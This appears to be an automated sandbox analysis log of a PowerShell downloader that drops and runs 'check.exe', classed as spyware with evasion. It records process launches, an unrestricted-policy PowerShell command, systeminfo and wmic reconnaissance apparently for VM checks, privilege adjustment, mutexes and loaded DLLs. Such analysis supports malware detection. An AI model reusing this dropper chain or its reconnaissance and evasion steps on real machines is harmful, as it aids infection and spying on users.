Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeCode function: String function: 00007FFB9DD61070 appears 43 times
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3120 -s 968
Source: unicodedata.pyd.4.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: python3.dll.6.drStatic PE information: No import functions for PE file found
Source: python3.dll.4.drStatic PE information: No import functions for PE file found
Source: Qt5Core.dll.4.drStatic PE information: Section: .qtmimed ZLIB complexity 0.997458770800317
Source: Qt5Core.dll.6.drStatic PE information: Section: .qtmimed ZLIB complexity 0.997458770800317
Source: classification engineClassification label: mal68.spyw.evad.winPS1@39/433@1/1
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeCode function: 16_2_00007FFB9DD67E20 GetCurrentProcess,OpenProcessToken,GetLastError,ImpersonateSelf,OpenProcessToken,GetLastError,PyErr_SetFromWindowsErrWithFilename,LookupPrivilegeValueA,GetLastError,PyErr_SetFromWindowsErrWithFilename,AdjustTokenPrivileges,GetLastError,PyErr_SetFromWindowsErrWithFilename,AdjustTokenPrivileges,RevertToSelf,CloseHandle,16_2_00007FFB9DD67E20
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeCode function: 16_2_00007FFB9DD62A30 PyArg_ParseTuple,PyUnicode_AsWideCharString,PyEval_SaveThread,GetDiskFreeSpaceExW,PyEval_RestoreThread,PyMem_Free,PyExc_OSError,PyErr_SetExcFromWindowsErrWithFilenameObject,Py_BuildValue,16_2_00007FFB9DD62A30
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeCode function: 16_2_00007FFB9DD66069 PyDict_New,memset,CreateToolhelp32Snapshot,PyErr_SetFromWindowsErr,_Py_Dealloc,Process32First,PyLong_FromLong,PyLong_FromLong,PyDict_SetItem,_Py_Dealloc,_Py_Dealloc,Process32Next,CloseHandle,_Py_Dealloc,_Py_Dealloc,_Py_Dealloc,CloseHandle,16_2_00007FFB9DD66069
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeCode function: 16_2_00007FFB9DD68B10 PyArg_ParseTuple,StartServiceA,CloseServiceHandle,CloseServiceHandle,_Py_NoneStruct,_Py_NoneStruct,16_2_00007FFB9DD68B10
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\nozEdZJe.zipJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4052:120:WilError_03
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4360:120:WilError_03
Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3120
Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7100
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1928:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3976:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7076:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2044:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3576:120:WilError_03
Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5536
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dxska3ev.3nn.ps1Jump to behavior
Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: check.exeString found in binary or memory: <!--StartFragment-->
Source: check.exeString found in binary or memory: <!--StartFragment-->
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe "C:\Users\user\AppData\Roaming\kbHYWyel\check.exe"
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeProcess created: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe "C:\Users\user\AppData\Roaming\kbHYWyel\check.exe"
Source: unknownProcess created: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe "C:\Users\user\AppData\Roaming\kbHYWyel\check.exe"
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\systeminfo.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get manufacturer"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get manufacturer
Source: unknownProcess created: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe "C:\Users\user\AppData\Roaming\kbHYWyel\check.exe"
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeProcess created: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe "C:\Users\user\AppData\Roaming\kbHYWyel\check.exe"
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3120 -s 968
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\systeminfo.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get manufacturer"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get manufacturer
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeProcess created: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe "C:\Users\user\AppData\Roaming\kbHYWyel\check.exe"
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7100 -s 968
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\systeminfo.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get manufacturer"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get manufacturer
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5536 -s 1012
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe "C:\Users\user\AppData\Roaming\kbHYWyel\check.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeProcess created: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe "C:\Users\user\AppData\Roaming\kbHYWyel\check.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfoJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get manufacturer"Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeProcess created: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe "C:\Users\user\AppData\Roaming\kbHYWyel\check.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get manufacturerJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeProcess created: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe "C:\Users\user\AppData\Roaming\kbHYWyel\check.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get manufacturer"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get manufacturer
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get manufacturer"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get manufacturer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: libffi-8.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: qt5core.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: msvcp140.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: msvcp140_1.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: libcrypto-3.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: libssl-3.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: pdh.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: qt5widgets.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: qt5gui.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: qt5gui.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: d3d11.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: d3d9.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: dataexchange.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: dcomp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: version.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: vcruntime140.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: libffi-8.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: qt5core.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: netapi32.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: msvcp140.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: msvcp140_1.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: vcruntime140_1.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: vcruntime140_1.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: libcrypto-3.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: libssl-3.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: powrprof.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: pdh.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: umpdc.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: qt5widgets.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: qt5gui.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: qt5gui.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: dwmapi.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: d3d11.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: dxgi.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: d3d9.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: d3d10warp.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: dataexchange.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: dcomp.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: twinapi.appcore.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
